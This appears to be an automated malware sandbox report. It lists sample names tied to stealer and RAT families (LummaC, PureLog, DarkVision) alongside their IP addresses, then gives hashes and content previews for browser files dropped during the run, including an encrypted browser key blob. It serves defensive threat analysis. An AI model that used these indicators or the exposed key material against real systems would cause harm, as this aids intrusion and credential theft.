armv5l.elf | malicious | Unknown | 23.2.226.220
ZxSWvC0Tz7.exe | malicious | LummaC | 104.102.49.254
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: a0e9f5d64349fb13191bc781f81f42e1
sEG2xXpg0X.xlsm | malicious | Unknown | 104.21.80.52
Drivespan.dll | malicious | Unknown | 104.21.80.52
installer_1.05_36.8.exe | malicious | LummaC | 104.21.80.52
setup.exe | malicious | LummaC | 104.21.80.52
SET_UP.exe | malicious | LummaC | 104.21.80.52
anrek.mp4.hta | malicious | LummaC Stealer | 104.21.80.52
title.mp4.hta | malicious | LummaC, PureLog Stealer, zgRAT | 104.21.80.52
Setup.exe | malicious | LummaC | 104.21.80.52
PI ITS15235.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.80.52
un30brGAKP.exe | malicious | LummaC | 104.21.80.52
Match | Associated Sample Name / URL | Detection | Threat Name

Match: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
9mauyKC3JW.exe | malicious | Unknown
ATLEQQXO.exe | malicious | Unknown
ATLEQQXO.exe | malicious | Unknown
upgrade.hta | malicious | DarkVision Rat
MiJZ3z4t5K.exe | malicious | Unknown
UolJwovI8c.exe | malicious | Unknown
ONHQNHFT.msi | malicious | Unknown
es.hta | malicious | Unknown
BkTwXj17DH.exe | malicious | Unknown
Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 8373
Entropy (8bit): 5.784946701536982
Encrypted: false
SSDEEP: 192:fsNwD9seiRUw0j6lkDs6qRAq1k8SPxVLZ7VTiQ:fsNwM1q62Ds6q3QxVNZTiQ
MD5: EF1A60C56772EE9DEE27BAE89A2DA8C5
SHA1: 1F6120E7792A8AEA892CDB8410276DE92CCD1A58
SHA-256: A6B014F024D6A8C15F78567E05E8E3121A35628A2B191B7CC7622F580AEB6DD8
SHA-512: 5D31A7FF99DC76ECE123FD2E493020F8C5957ADB4A2C6875EAAE724CA09D46FAADC0446004F6F5BE66072F3F4457753BB44C42C66C7C6A625E7C6B1298974C6A
Malicious: false
Preview: {"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 23939
Entropy (8bit): 6.047804665767351
Encrypted: false
SSDEEP: 384:E1tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhIwbsdDMfT35ub/Y3jFd4X:EfMkbJrT8IeQc5d1lbsdDMfL5uTY3JY
MD5: 0D0CF6FF78F3077D61441C847C265303
SHA1: D50E83A8C385F63717FFA3A2B651A702E607C07C
SHA-256: 905791D3B9F2BB310E025E36B81418D23FE52E5AE6B13CE039490569AD7AEBD9
SHA-512: 4C7D040D484B9CFD7880DF2293724041FD7ECCAE2A5E3E1FA0CB73C4B2A5D59E50C761D003EAFC067868EB8B3AF7FFD25EC5EFA27142F19F9A958597F4CDCCCB
Malicious: false
Preview: {"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380674699199088","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736201103"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 22913
Entropy (8bit): 6.045616245778781
Encrypted: false
SSDEEP: 384:E1tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhIwr62DmT35ub/Y3jFd4T:EfMkbJrT8IeQc5d1lr62DmL5uTY3J2
MD5: 6D959DF58E03DC4C8BD6252FD318D0CC
SHA1: 831E9E0079C8EB303C3B0A31F65A5F594A4A5BDB
SHA-256: 2F5EED27113FCE288E57BF5DDE5B7940774DC1EBAFB6F13E90D7011E6C7F4427
SHA-512: A3D6CEE63E7D937F6E942916329209DF968D3E09B5AFE4420B58376E0C8FC75629A5F4978E352ABCA86988CEA9C24B798F0843A72742A80E5430213D45B6FF1A
Malicious: false
Preview: {"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380674699199088","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736201103"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: modified
Size (bytes): 23955
Entropy (8bit): 6.048048787523318
Encrypted: false
SSDEEP: 384:E1tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhIwbGTDGjfT35ub/Y3jFd4X:EfMkbJrT8IeQc5d1lbGTDCfL5uTY3JY
MD5: 4E7C799F78E250EB07FCB465E4F98380
SHA1: 4EE7DEB750C34A0C06AEAC463B6A09957295F424
SHA-256: 12391B31B8BC70C3C56369F05F6940AEC768041432F60C4E26201C7839F15EE8
SHA-512: AE1E9AC6E581FA909383CB01DA867A62620052A7AE32BE1661326C79A5D5871D782BE5783C12D25C5C7721BB09A55F1C7D685BB7916634611904A834162EEA8D
Malicious: false
Preview: {"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380674699199088","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736201103"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 6820
Entropy (8bit): 5.791630604454772
Encrypted: false
SSDEEP: 96:iaqkHfL9whCx5ih/cI9URLl8RotonMFVvlwh3e4IbONIeTC6XQS0qGqk+Z4uj+rJ:akD9SeiRUEhp6qRAq1k8SPxVLZ7VTiq
MD5: D2C04F360BBEE0CCAB877650F77D6A0D
SHA1: 511678F6BF42EC8A7B47D8755D7DBCA93E976941
SHA-256: 505002CE8C56D2371C17D72BB3165DE7F644FE1FBB425E28C28C28679AF5BD86
SHA-512: 1AD370E57685FD2E62C5C07C814BC79077FE16FCC8A2953170B03C67123E9AE16E4E5AC6637F8AE11C481F07C0641D5C8E22A412698AA4AAB4CF134B5902A02F
Malicious: false
Preview: {"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADI/LhEPT7sQ5P1M/tRACcVEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACPfNigfdtXRXofPnAVlPSW+lMCEaS+SDrcjkNJ6KX4SgAAAAA

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: modified
Size (bytes): 23939
Entropy (8bit): 6.047804665767351
Encrypted: false
SSDEEP: 384:E1tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhIwbsdDMfT35ub/Y3jFd4X:EfMkbJrT8IeQc5d1lbsdDMfL5uTY3JY
MD5: 0D0CF6FF78F3077D61441C847C265303
SHA1: D50E83A8C385F63717FFA3A2B651A702E607C07C
SHA-256: 905791D3B9F2BB310E025E36B81418D23FE52E5AE6B13CE039490569AD7AEBD9
SHA-512: 4C7D040D484B9CFD7880DF2293724041FD7ECCAE2A5E3E1FA0CB73C4B2A5D59E50C761D003EAFC067868EB8B3AF7FFD25EC5EFA27142F19F9A958597F4CDCCCB
Malicious: false
Preview: {"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380674699199088","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736201103"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 107893
Entropy (8bit): 4.640159935562401
Encrypted: false
SSDEEP: 1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
MD5: D50EDBCB24807CB644253C4476148A1B
SHA1: CBA3D7B6C0134871E694EDEDD4430947482F654B
SHA-256: F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
SHA-512: B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
Malicious: false
Preview: {"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 107893
Entropy (8bit): 4.640159935562401
Encrypted: false
SSDEEP: 1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
MD5: D50EDBCB24807CB644253C4476148A1B
SHA1: CBA3D7B6C0134871E694EDEDD4430947482F654B
SHA-256: F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
SHA-512: B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
Malicious: false
Preview: {"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: data
Category: dropped
Size (bytes): 4194304
Entropy (8bit): 0.03992437171506724
Encrypted: false
SSDEEP: 192:4B01utmqvDzKX7HJ8iD12absbZHtgbXIghxULHhJfNEl/cRQMczKDtCn8y08TcmQ:e0EtelWCuhlgQmKDA08T2RGOD
MD5: 7744619E95461B03723BC2AD297D8490
SHA1: EE5FDDF07D7C85A720BFF93006A0E2785E3FADB8
SHA-256: 6CDA53B8B4D4294141A07A3A47939AB80A934C4600589109A3038C9EA98D803D
SHA-512: 13D6BDF267AE41E1FDA597181ED32F549EF7E81C12E8511E4F1494D0F3EB4838CFC93F3808380234896D69035D4DA1149AFC58EDA0DB4624D4F461EE61191A08
Malicious: false
Preview: ...@..@...@.....C.].....@...............xa..0Q..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....u.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".eqswos20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U..G..>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z.......................................................................

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):4194304
Entropy (8bit):0.44463200331854225
Encrypted:false
SSDEEP:6144:ibsqmAG69qJlm0YkzY2jqBx/TvQ+CaHC:S9qJI0mr
MD5:EDBCA858956888AE0C86E63A01F5AAA8
SHA1:41ECEE0A358EEF75BBC28963778883640EE7D5C9
SHA-256:AEC0D9CED4F9780DA5395D4E5B9BE1CE8AB8EF87C6E16A969950B6F257D7521E
SHA-512:697CAEF83544718BADE07998076F64BD4630E9DD608ABFEFF90B2898C76AD14E8D36831032A93DF6CA31E3A375F7F69E763BD1F080A967B667AEAFFC151EFCD2
Malicious:false
Preview:...@..@...@.....C.].....@...................(...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....m.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".eqswos20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U?:K...G..>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....triggered....(..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):4194304
Entropy (8bit):0.04071709805136424
Encrypted:false
SSDEEP:192:fw0EbtmqvDtKX7RJEa3XxxTxqZ/g+X0970R6EqhTS7N4nUg1gQLGjwvn8y08TcmQ:40EtGeK8YxFhAQ7gPEv08T2RGOD
MD5:1E75831DBBCB99928730282FF484108C
SHA1:13DE0C51D33C7C73E691A32427BF50CB137C07D9
SHA-256:D500AB9E03294B0A9D6BA2F9594A09706BC11524783AF36DF64F9BDF404E2728
SHA-512:1074FF1A93743C31AF79BEFE4ECE36D6327A8DEB1721130993D11288821C6CCF5C69FA2A5FFBC8BADEAB3068D96F9D55E48A2B255A3CBFD652B18182CEC92A4A
Malicious:false
Preview:...@..@...@.....C.].....@................b...Q..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".eqswos20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):4194304
Entropy (8bit):0.03989860985937406
Encrypted:false
SSDEEP:192:0f0EbtmqvD3KX7LJEa3Xxx7uqZGXPtg34N+hHBNEynI1gQMSzoAYn8y08Tcm2RGY:Y0Et2e18xFhhBggez208T2RGOD
MD5:41F376267A72B3427BB5390B09E69642
SHA1:6566494448FC3DE8E473FBF63DCF2CD230EFF9F1
SHA-256:17BEDA8FF8FBA15D57099FEC77B544498E7AF17287650E2AD0BE83BC836D3C93
SHA-512:F3A687CBCC07ADBB9A98876BE07938F4836A21F1FC88E410607EB2D9C54F34C96CBCD7072B28A8958F01E7B0F8F1779EB4BA3F887345FA58632FC326EE6F27DF
Malicious:false
Preview:...@..@...@.....C.].....@................`...O..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....}.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".eqswos20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...............................................................
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):16384
Entropy (8bit):0.3553968406659012
Encrypted:false
SSDEEP:12:biUXhV0xosU8xCe+JKlkQuMRxCb8ZXfgYJ0IJpP0KLsyW1L7Fx6:bFRqxosU8xWMk8xVZ4YWI30otWn
MD5:CFAB81B800EDABACBF6CB61AA78D5258
SHA1:2730D4DA1BE7238D701DC84EB708A064B8D1CF27
SHA-256:452A5479B9A2E03612576C30D30E6F51F51274CD30EF576EA1E71D20C657376F
SHA-512:EC188B0EE4D3DAABC26799B34EE471BEE988BDD7CEB011ED7DF3D4CF26F98932BBBB4B70DC2B7FD4DF9A3981B3CE22F4B5BE4A0DB97514D526E521575EFB2EC6
Malicious:false
Preview:...@.@...@..............@...................................`... ...i.y.........CrashpadMetrics.....i.y..Yd.h.......A.......e............,.........W.......................W....................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.UsedPct.......h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e...........i.y..Yd.........A............................E.[4.f..................E.[4.f.................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.Errors............i.y..Yd.........A..................._..-`....h-.....................h-....................Crashpad.HandlerLifetimeMilestone.......0...i.y.[".........................................i.y..Yd.@.......C...........................VM....],................WM....],................Stability.BrowserExitCodes...... ...i.y......VM....],........H...i.y.1U!S............................................................ ...i.y...0...WM....],........................................
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):280
Entropy (8bit):3.060980776278344
Encrypted:false
SSDEEP:3:FiWWltl/9UgBVP/Sh/JzvLi2RRIxINXj1J1:o1//BVsJDG2Yq
MD5:74B32A83C9311607EB525C6E23854EE0
SHA1:C345A4A3BB52D7CD94EA63B75A424BE7B52CFCD2
SHA-256:06509A7E418D9CCE502E897EAEEE8C6E3DCB1D0622B421DD968AF3916A5BFF90
SHA-512:ADC193A89F0E476E7326B4EA0472814FE6DD0C16FC010AAF7B4CF78567D5DF6A1574C1CE99A63018AFE7E9AD68918147880621A3C00FAA7AD1014A0056B4B9C4
Malicious:false
Preview:sdPC......................5.y&.K.?....................................................................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................48ea0ba2-e9bb-4568-92cb-0f42a5c5d505............
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):34462
Entropy (8bit):5.558701456590119
Encrypted:false
SSDEEP:768:TOhlEhpWPdBfq38F1+UoAYDCx9Tuqh0VfUC9xbog/OV+F7Ilrw/pQDdKp3tuR:TOhlEhpWPdBfq3u1jaH1IO/pauty
MD5:742EA671A3705EE09904218D2E4B51E5
SHA1:644C10C785935458C159564C459337FD00D4FA61
SHA-256:FFB6E2457C6ED9863E641322222157EE85E10733CEE3F9FB49D4A7FB3C48298A
SHA-512:072316A3006CF08589F2475AF8B237ED6E0BDC838B1E949FA18213C58BB237F0D28A1A958FF6BB4DE4491A3629778B08242EB8B7FBD49EA4F549A09328D556C5
Malicious:false
Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380674698346217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380674698346217","location":5,"ma
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:L:L
MD5:5058F1AF8388633F609CADB75A75DC9D
SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:false
Preview:.
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):39660
Entropy (8bit):5.5627188428776035
Encrypted:false
SSDEEP:768:TOhlElj7pLGLhDpWPdBfN38F1+UoAYDCx9Tuqh0VfUC9xbog/OVCZ2F7Ilrw/pIv:TOhlElVchDpWPdBfN3u1javZ21IO/pS1
MD5:24D7D23FC23EBFC2F34ED294169B449B
SHA1:11F17CD09D189CFA68AD62FB10025EBD5D373892
SHA-256:7436F648B2CCF4344EB0F93D72F7DD8FC0DE9E7C33BE5F8F6D0870F2B147F2AB
SHA-512:CA878F2E71B9DEAA58B4DD9FE0F3FCCE99D91A041D16B65FA39285FE902A9A5E4E1108C87AB2ED209AD2DCBCFDFA7B2CD3EB0777758B5145077E70D9214173A2
Malicious:false
